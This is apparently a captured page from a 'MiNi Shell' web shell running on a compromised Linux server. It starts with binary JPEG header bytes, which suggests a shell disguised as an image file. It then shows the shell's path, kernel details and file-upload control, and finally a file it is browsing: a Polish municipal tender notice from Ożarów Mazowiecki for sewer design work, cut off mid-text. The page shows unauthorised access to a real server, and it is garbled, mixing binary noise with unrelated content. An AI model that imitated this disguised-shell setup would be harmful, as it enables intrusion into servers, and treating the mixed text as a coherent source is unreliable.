JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210628/0009664501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00096645 z dnia 2021-06-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie koncepcji oraz dokumentacji technicznych - opracowanie projektów budowlano-wykonawczych: </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ożarów Mazowiecki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013271269</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ożarów Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-850</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 731 32 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">22 722 18 87</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@ozarow-mazowiecki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ozarow-mazowiecki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie koncepcji oraz dokumentacji technicznych - opracowanie projektów budowlano-wykonawczych: </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-381cad90-d7e8-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00096645</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002071/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.8 Wykonanie koncepcji oraz dokumentacji technicznej budowy sieci kanalizacji sanitarnej (Wolskie, Mory etap I, Jawczyce etap I), budowy sieci wodociągowej (Mory)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.ozarow-mazowiecki.pl/?c=3381 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/,https://epuap.gov.pl/wps/portal (składanie, zmiana oraz wycofanie<br/>ofert odbywa się przy użyciu środków komunikacji elektronicznej) 2) komunikacja pomiędzy<br/>Zamawiającym a Wykonawcami,w szczególności: składanie oświadczeń, wniosków, zawiadomień oraz<br/>przekazywanie informacji,wezwań do złożenia, uzupełnienia, wyjaśnienia oświadczeń lub dokumentów,<br/>zadawanie pytań, jak i udzielanie odpowiedzi odbywa się tylko za pośrednictwem poczty elektronicznejZamawiającego:zampub@ozarow-mazowiecki.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.W niniejszym postępowaniu o udzielenie zamówienia publicznego: a) składanie, zmiana oraz<br/>wycofanie ofert odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy<br/>Pzp,poprzez:-miniPortal : https://miniportal.uzp.gov.pl/, - ePUAP<br/>:https://epuap.gov.pl/wps/portalb)komunikacjapomiędzy Zamawiającym a Wykonawcami, w<br/>szczególności: składanie oświadczeń,wniosków,zawiadomień oraz przekazywanie informacji,wezwań<br/>do złożenia,uzupełnienia,wyjaśnienia oświadczeń lub dokumentów, zadawanie pytań,jak i udzielanie<br/>odpowiedziodbywa się tylko za pośrednictwem poczty elektronicznej Zamawiającego na adres e-mail: -<br/>zampub@ozarowmazowiecki.pl.Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Instrukcji korzystania z miniPortalu<br/>nastroniehttps://www.uzp.gov.pl/ oraz Regulaminie ePUAP.2. Wykonawca zamierzający wziąć udział w<br/>postępowaniu , musi posiadać konto na ePUAP (https://epuap.gov.pl/wps/portal)3. Wykonawca składa<br/>ofertę za pośrednictwem formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i<br/>udostępnionego również na miniPortalu.4. Wykonawcy powinni zapoznać się z postanowieniami niżej wymienionych dokumentów:Regulaminu korzystania z systemu miniPortal,Instrukcji użytkownika<br/>systemu miniPortal – ePUAP. 5.Ofertę należy złożyć w oryginale w postaci elektronicznej, opatrzoną<br/>kwalifikowanym podpisem elektronicznym , podpisem zaufanym lub podpisem osobistym.- zaleca się<br/>stosowanie podpisu wewnętrznego, który polega na tym, że jest zapisany łącznie z podpisywanym<br/>dokumentem (tworzą jeden plik), a nie oddzielnie (plik podpisywany i plik podpisu),-zaleca się<br/>sporządzenie oferty i załączników do ofert w formacie PDF i podpisanie podpisem kwalifikowanym w<br/>formacie PAdES,- w przypadku wykorzystania formatu podpisu XAdES zewnętrzny.Zamawiający<br/>wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików XAdES.-<br/>zaleca się stosowanie znacznika czasu w podpisie kwalifikowanym,- wykonawca nie może szyfrować<br/>przekazywanych plików,6.Oferta musi być podpisana kwalifikowanym podpisem elektronicznym przez<br/>osoby upoważnione do reprezentowania Wykonawcy7. Wszystkie pliki stanowiące ofertę należy<br/>skompresować do jednego pliku archiwum (zip). Maksymalny rozmiarplików przesyłanych za<br/>pośrednictwem dedykowanego formularza do: złożenia, zmiany, wycofania oferty lub wniosku<br/>wynosi150 MB.8.Dokumenty (pliki) które zaczną być ładowane do miniPortalu przed upływem terminu<br/>składania ofert lecz proces ten nie zakończy się sukcesem do upływu terminu składania ofert,zostaną<br/>uznane za niezłożone (przypadek składania ofert w ostatniej chwili)9.Zamawiający zaleca<br/>wyodrębnienie informacji stanowiących tajemnice przedsiębiorstwa poprzez wyodrębnienie ich do<br/>osobnego pliku z jednoczesnym zaznaczeniem polecenia: „Załącznik stanowiący tajemnicę<br/>przedsiębiorstwa”, a następnie wraz z plikami stanowiącymi jawną część należy ten plik<br/>zaszyfrować.10. Za datę przekazania oferty, wniosków, zawiadomień,dokumentów<br/>elektronicznych,oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych<br/>informacji przyjmuje się datę ich przekazania na ePUAP adres: /143206/skrytka lub adres poczty<br/>elektronicznej Zamawiającego: zampub@ozarow-mazowiecki.pl 11. Sposób sporządzenia dokumentów<br/>elektronicznych musi być zgodny z wymaganiami określonymi w rozp. PRMz dnia30grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. 2020 poz. 2452) oraz rozp.MRPiT 23 grudnia 20220 r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń jakich może<br/>żądać Zamawiający od Wykonawcy (Dz. U. 2020 poz.2415)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych pozyskanych od<br/>Wykonawcy w ramach wykonywania Umowy jest Zamawiający.2. W ramach wykonania obowiązku<br/>informacyjnego, zgodnie z rozporządzeniem Parlamentu Europejskiego i rady (UE)2016/679z<br/>dnia27kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich informacji<br/>danychorazuchyleniadyrektywy95/46/WE (Dz. Urz. UE L 119 z 04.05.2016) - dalej RODO,Wykonawca<br/>poinformuje osoby,których jakiekolwiek dane osobowe zostały przekazane Zamawiającemu, o<br/>posiadaniu i przetwarzaniu danych osobowych tych osób przez Zamawiającego w celu wykonywania<br/>Umowy.3. Wykonawca zobowiązany jest także poinformować osoby, o których mowa powyżej, o prawie<br/>dostępu do treści danych, ich poprawiania, modyfikacji oraz możliwości skorzystania z innych<br/>uprawnień przewidzianych unormowaniami RODO.4. Dane identyfikujące Wykonawcę,przedmiot<br/>umowy i wysokość wynagrodzenia, stanowią informację publiczną w rozumieniu art. 1 ust. 1ustawy z<br/>dnia 6września2001 r. o dostępie do informacji publicznej (t.j. Dz. U. z 2019 r. poz. 1429),która podlega<br/>udostępnianiu w trybie przedmiotowej ustawy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP.271.30.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje wykonanie koncepcji, a następnie dokumentacji technicznej (<br/>opracowanie projektów budowlano-wykonawczych) wraz z uzyskaniem prawomocnych<br/>pozwoleń dla elementów zamówienia dla których w/w decyzje są wymagane przepisami prawa<br/>w celu budowy :<br/>Cz. A – sieci kanalizacji sanitarnej w miejscowości Wolskie<br/>Szacowana długość sieci kanalizacji sanitarnej grawitacyjnej ok. 2000,0 mb oraz kanalizacji tłocznej ok 1500,0 mb (bez przyłączy) wraz z kompletem uzgodnień. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 600000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7<br/>ustawy Pzp,<br/>tzn. polegających na powtórzeniu podobnych usług, stanowiących niniejsze zamówienie podstawowe<br/>- Wartość usług, o których mowa powyżej może wynieść maksymalnie do 50 % wartości<br/>zamówienia podstawowego<br/>- Warunki na jakich zostaną udzielone powyższe usługi – będą zgodne z przedmiotem zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Zamawiający dokona oceny kryterium ceny z dokładnością do dwóch<br/>miejsc po przecinku zgodnie z zasadami matematycznymi, w kryterium doświadczenie osób wyznaczonych do realizacji zamówienia przyznane zostaną punkty całkowite (0,20,40).<br/>2. Zamawiający wybierze ofertę najkorzystniejszą na część A spośród nie odrzuconych ofert na podstawie kryterium ceny i doświadczenia osób wyznaczonych do realizacji zamówienia.<br/>3.Za najkorzystniejszą zostanie uznana oferta na część A z największą ilością punktów, stanowiących sumę punktów przyznanych w każdym kryterium z uwzględnieniem wagi procentowej danego kryterium.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje wykonanie koncepcji, a następnie dokumentacji technicznej (<br/>opracowanie projektów budowlano-wykonawczych) wraz z uzyskaniem prawomocnych<br/>pozwoleń dla elementów zamówienia dla których w/w decyzje są wymagane przepisami prawa<br/>w celu budowy :<br/>Cz. B – sieci kanalizacji sanitarnej w miejscowości Mory - etap I<br/>Szacowana długość sieci kanalizacji sanitarnej grawitacyjno-ciśnieniowej ok. 1500,0 mb (bez<br/>przyłączy) wraz z kompletem uzgodnień. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 50000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7<br/>ustawy Pzp,<br/>tzn. polegających na powtórzeniu podobnych usług, stanowiących niniejsze zamówienie podstawowe<br/>- Wartość usług, o których mowa powyżej może wynieść maksymalnie do 50 % wartości<br/>zamówienia podstawowego- Warunki na jakich zostaną udzielone powyższe usługi – będą zgodne z przedmiotem zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Zamawiający dokona oceny kryterium ceny z dokładnością do dwóch<br/>miejsc po przecinku zgodnie z zasadami matematycznymi, w kryterium doświadczenie osób<br/>wyznaczonych do realizacji zamówienia przyznane zostaną punkty całkowite (0,20,40).<br/>2. Zamawiający wybierze ofertę najkorzystniejszą na część B spośród nie odrzuconych ofert na<br/>podstawie kryterium ceny i doświadczenia osób wyznaczonych do realizacji zamówienia.<br/>3.Za najkorzystniejszą zostanie uznana oferta na część B, z największą ilością punktów, stanowiących<br/>sumę punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób wyznaczonych do realizacji zamowienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje wykonanie koncepcji, a następnie dokumentacji technicznej (<br/>opracowanie projektów budowlano-wykonawczych) wraz z uzyskaniem prawomocnych<br/>pozwoleń dla elementów zamówienia dla których w/w decyzje są wymagane przepisami prawa<br/>w celu budowy :<br/>Cz. C – sieci kanalizacji sanitarnej w miejscowości Jawczyce – etap I<br/>( ul. Różana, ul. Piwna, ul. Wąska, ul. Gołąbkowska wraz z przejściem pod PKP do istniejącej<br/>sieci kanalizacji sanitarnej tłocznej u zbiegu ul. Królowej Marysieńki i ul. Wspólnej Drogi w<br/>Morach, Gmina Ożarów Mazowiecki )<br/>Szacowana długość sieci kanalizacji sanitarnej grawitacyjno-ciśnieniowej ok. 2000,0 mb (bez<br/>przyłączy) wraz z kompletem uzgodnień. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 70000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7<br/>ustawy Pzp,<br/>tzn. polegających na powtórzeniu podobnych usług, stanowiących niniejsze zamówienie podstawowe<br/>- Wartość usług, o których mowa powyżej może wynieść maksymalnie do 50 % wartości<br/>zamówienia podstawowego<br/>- Warunki na jakich zostaną udzielone powyższe usługi – będą zgodne z przedmiotem zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny kryterium ceny z dokładnością do dwóch<br/>miejsc po przecinku zgodnie z zasadami matematycznymi, w kryterium doświadczenie osób<br/>wyznaczonych do realizacji zamówienia przyznane zostaną punkty całkowite (0,20,40).<br/>2.Zamawiający wybierze ofertę najkorzystniejszą na część C spośród nie odrzuconych ofert na<br/>podstawie kryterium ceny i doświadczenia osób wyznaczonych do realizacji zamówienia.<br/>3. Za najkorzystniejszą zostanie uznana oferta na część C z największą ilością punktów, stanowiących<br/>sumę punktów przyznanych w każdym kryterium z uwzględnieniem wagi procentowej danego<br/>kryterium.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób wyznaczonych do 